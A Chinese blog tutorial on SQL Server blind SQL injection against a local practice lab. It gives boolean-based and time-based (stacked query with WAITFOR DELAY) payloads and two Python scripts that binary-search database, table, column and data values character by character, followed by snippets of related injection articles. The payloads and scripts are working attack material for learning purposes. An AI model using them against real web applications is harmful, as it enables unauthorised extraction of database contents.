SQL Server从0到1——盲注

最新推荐文章于 2024-10-03 21:40:23 发布
最新推荐文章于 2024-10-03 21:40:23 发布
阅读量487 收藏 9
点赞数 12
文章标签: web安全 网络 安全 学习 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/135335248
版权

布尔盲注(有回显)

1.爆破数据库名:

ascii(substring(db_name(),1,1))=95
#使用substring将字符串分解,对比ascii码

2.爆破表名:

1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))<95)
#通过条件筛选,并使用count来回去返回的行数,如果为1就说明存在,及正确

3.爆破字段名:

ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where  table_name='users'),1,1))<95
#通过对比ascii码

4.爆破数据:

ascii(substring((select top 1 username from users),1,1))<95

附带一个简单的脚本

import requests
from time import time

url='http://192.168.0.105/less-1.asp'

result=''
for num in range(1,100):
    #取32-128的ascii码
    pointer = 1
    min=32
    max=128
    #num为当前的爆破的字符位置
    #pointer为正在使用的ascii
    while 1:
        pointer=min+(max-min)//2
        if min==pointer:
            if pointer == 127 or pointer == 0:
                exit()
            result += chr(pointer)
            print(result)
            break

        # 爆表名
        #payload = f"?id=1' and ascii(substring((select top 1 name from master.dbo.sysdatabases),{num},1)) < {pointer}--+".format(
        #num, pointer)
        # 爆表名
        # payload = f"?id=1' and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,{num},1))<{pointer})--+".format(
        #     num, pointer)
        # 爆表名
        payload = f"?id=1' and ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where  table_name='users'),{num},1))<{pointer}--+".format(
            num, pointer)
        result_html=requests.get(url=url+payload).text
        # print(result_html)
        if r"Your Login name" in result_html:
            max=pointer
        else :
            min=pointer

时间盲注(无回显)

使用WAITFOR DELAY进行延迟

;if (ascii(substring(db_name(),2,1)))=101 WAITFOR DELAY '0:0:5'
#这里利用并不能像mysql一样在where语句后添加if语句,而是只能利用堆叠注入添加一个if语句来执行延迟
操作和布尔盲注基本一样,在这里直接上脚本:
import requests


import time


url='http://192.168.0.105/less-1.asp'


result=''
for num in range(1,100):
    #取32-128的ascii码
    pointer = 1
    min=32
    max=128
    #num为当前的爆破的字符位置
    #pointer为正在使用的ascii
    while 1:
        pointer=min+(max-min)//2
        if min==pointer:
            if pointer == 127 or pointer == 0:
                exit()
            result += chr(pointer)
            print(result)
            break


        # 爆表名
        payload = f"?id=1';if(ascii(substring((select top 1 name from master.dbo.sysdatabases),{num},1))) < {pointer} WAITFOR DELAY '0:0:1'--+".format(
        num, pointer)
        # 爆表名
        # payload = f"?id=1' if(1)=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,{num},1))<{pointer}) WAITFOR DELAY '0:0:1'--+".format(
        #     num, pointer)
        # 爆表名
        # payload = f"?id=1';if(ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where  table_name='users'),{num},1)))<{pointer} WAITFOR DELAY '0:0:1'--+".format(
        #     num, pointer)
        result_html=requests.get(url=url+payload).text
        # print(url+payload)
        # print(result_html)
        try:
            r = requests.get(url=url+payload,timeout=0.5)
            min = pointer
        except:
            max = pointer
        time.sleep(0.2)
    time.sleep(1)

值得注意的是,盲注其实也可以使用like加通配符进行注入,但是如果使用ascii,可以使用二分法减少运算量,因此like的方法我们就不在重复,浪费大家的时间了,推荐使用二分法

网安星星
关注
sqlserver数据库布尔盲注_WEB安全SQL注入(4)——布尔盲注
weixin_39955781的博客
01-14 286
大家好,我是阿里斯,一名IT行业小白。今天分享的内容是布尔注入,分两个部分,手工注入(burpsuite辅助)和脚本注入。使用python写个脚本也是昨天一位群友提出的建议。何为盲注盲注就是在 sql 注入过程中,sql 语句执行的时候,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断我们这次查询是否成功,这个过程称之为盲注。布尔注入利用情景页面上没有显示位,并且没有输出SQL语句...
SQL盲注
ssslq的博客
03-02 771
SQL盲注实操
SQL Server 数据库部分常用语句小结(三)
最新发布
hongjian006的博客
10-03 589
原因是:Linux 和Windows 系统的默认换行符是不一样的,hive数据库是安装在Linux系统上的,通过notepad++ 查看导出的CSV文件其换行符为 LF。WITH NORECOVERY, MOVE '数据库名字_Data' TO 'D:\指定路径\数据库名字_Data.mdf',WITH NORECOVERY, MOVE '数据库名字_Data' TO 'D:\指定路径\数据库名字_Data.mdf',Step 1 关闭此数据库的用户连接,如果有用户连接到数据库的话会造成数据库重命名失败。
Sql server注入分类之盲注(布尔-时间-OOB)
qq_42990434的博客
12-16 2837
本章目录:布尔盲注第一步 判断注入第二步 猜解列数第三步 猜数据库名,表名:第四步 猜解字段第五步 判断字段长度第六步 猜解字段内容时间盲注利用条件注入语句OOB 注入利用条件原理检测利用/渗出 布尔盲注 总结: 布尔盲注就是靠逐个猜测与尝试弱口令的的方法,有报错的就是猜错了,没报错就对了。 第一步 判断注入 and 1=1 and 1=2 第二步 猜解列数 order by 1 #返回正确 order by 2 #返回正确 order by 3 #抛出错误 第三步 猜数据
Web应用安全Sqlserver盲注.pptx
06-19
Sqlserver盲注 Sqlserver盲注 1、SQL盲注 什么是SQL盲注SQL盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为三类: 1)基于布尔 SQL 盲注。 2)基于时间SQL 盲注。 3)基于报错的 SQL 盲注。 2、基于布尔的Sqlserver盲注 原理:构造逻辑判断。 方式: 1)非正则匹配注入。 2)like注入。 Sqlserver盲注 2、基于布尔的Sqlserver盲注 非正则匹配注入 可以利用逻辑函数进行判断,常用的函数有left()、len()和substring()函数。 Sqlserver盲注 left():left ( string, n ) 返回从左数共n位的字符串。 string:要截取的字符串。 n:截取的长度。 2、基于布尔的Sqlserver盲注 Sqlserver盲注 substring():substring(string, start, length) 截取字符串一部分并返回。 string:要截取的字符串。
sqlserver数据库布尔盲注_sql注入入门之mysql布尔型盲注
weixin_34393451的博客
12-24 465
1,实例 mysql 盲注点,如下,虽然这并不是个标标准准的盲注点,但并不影响我们用盲注的方式来获取数据,以后遇到纯正的盲注点,我们再补充:2,一阵单引号过后,目标数据库如期报错,对于mysql来讲,一般出现这情况,百分之九十九可以确定这就是个正儿八经的注入点3,尝试闭合,还是前面的问题,不要一眼看到数字就认定它是个数字型注入,比如该实例就又是个字符型注入,我们只需闭合前面的单引号注释掉后面的语句...
SQL盲注--布尔盲注
Auroraxsn的博客
04-27 3079
一、布尔盲注 1.特征: 某些网站输入参数后会判断,然后根据结果是或非返回页面。即普通注入只会返回其他页面,并没有回显 2.解决原理: 用函数(regexp,like,ascii,left,ord,mid,length)猜相关信息,正确时与错误时返回页面不一样,根据返回的页面来判断正确的数据信息。 3.基本流程 (1.判断注入类型 (2.判断列数 (3.获取数据库长度 构建有关数据库名的表达式,看页面返回情况判断表达式对错 length(str) 函数,返回字符串的长度 ...
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法在SQL盲注中的应用——以通达OA为例】 SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询,利用服务器的响应时间或状态来推断数据库的信息。在这个案例中,...
DVWA系列(七)——使用Burpsuite进行SQL Injection(Blind)(SQL盲注
橘子女侠
05-06 4328
1. SQL盲注简介 (1)SQL盲注 SQL Injection(Blind),即SQL盲注; 注入:可以查看到详细内容; 盲注:目标只会回复是或不是,没有详细内容; (2)手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是d啊?”,通过这种机械的询问,最终获得...
Kali渗透测试之DVWA系列8——SQL Injection(Blind)(SQL盲注)
浅浅的博客
06-13 1581
目录 一、SQL盲注 1、SQL盲注SQL注入的区别 2、SQL盲注的过程 二、实验环境 三、实验过程 基于布尔值的盲注 基于时间盲注 一、SQL盲注 1、SQL盲注SQL注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细的内容 2、SQL盲注的过程 1、判断是否存在注入,注入是字符型还是数字型 2、猜解当前数据库名 猜解数据库名的...
【DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 793
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
mssql盲注.txt
07-18
mssql盲注.txt
SQL注入-05】布尔盲注案例
m0_64378913的博客
04-26 1839
目录1 概述2 操作环境3 操作具体步骤3.1 判断是否存在注入点及注入的类型3.2 测试数据库库名长度3.3 逐个测试数据库库名的字符3.4 测试该数据库中所有表名3.5 测试users表中的所有字段名3.6 测试敏感字段的字段内容4 总结参考文章 1 概述 当改变浏览器传给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。具体参考《【SQL注入-02】SQL注入点的简单判断》。 布尔盲注:一般情况下,当带入参数为真
sql 把某一列拼接_SQL注入之Pikachu靶场戏耍
weixin_39695374的博客
12-03 237
网安引领时代,弥天点亮未来0x00软文目录盲注 常规型 布尔型 延时宽字节注入报错注入0x01测试实战盲注常规型MYSQL数据库版本5.0以上有一个information_scheam表存着关于MySQL服务器所维护的所有其他数据库的信息.如数据库名,数据库的表,表栏的数据类型与访问权限等。-lucy' union select group_concat(table...
sql注入之4时间盲注
技术骨干小李的博客
07-18 633
时间盲注思路
sql盲注
weixin_44720762的博客
04-14 6784
在这篇博客中我尝试着去学习和简单的介绍盲注。 那在开始之前,当然要简单的介绍一下什么是盲注。 之前我们有了解过,根据我们构造的payload的不同,后台数据库会返回错误提示,这给构造闭合语句的人提供了便利,但事实上,编写程序的安全人员并不会不知道这一点。为了解决这一安全问题,除了在后台设置相应的语句判断机制外,不提供对应的错误返回提示,或无论在什么情况下都提供相同的错误返回提示确实是一种降低渗透...
MySql复制一列到另一列
热门推荐
日拱一卒
12-14 1万+
mysql复制一列到另一列 UPDATE 表名 SET B列名=A列名 异表复制 需求一:把一个表某个字段内容复制到另一张表的某个字段 实现1: update B set extra = A.extra from A join B on (A.id = B.id); 实现2: update b set b.sms = (select a.sms from a where a.id = b.id...
sqlserver数据库布尔盲注_7.sql注入基础1
weixin_35089715的博客
01-14 570
1.1、自己描述一下sql注入原理SQL注入指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。1.2、注入分为那几类1.数字型注入2.字符型注入3.搜索型注入: select * from 表名 where 字段名 like '%对应值%' or...
sql盲注 解决_SQL注入之基于布尔的盲注详解
weixin_39638086的博客
12-19 585
基于布尔的盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值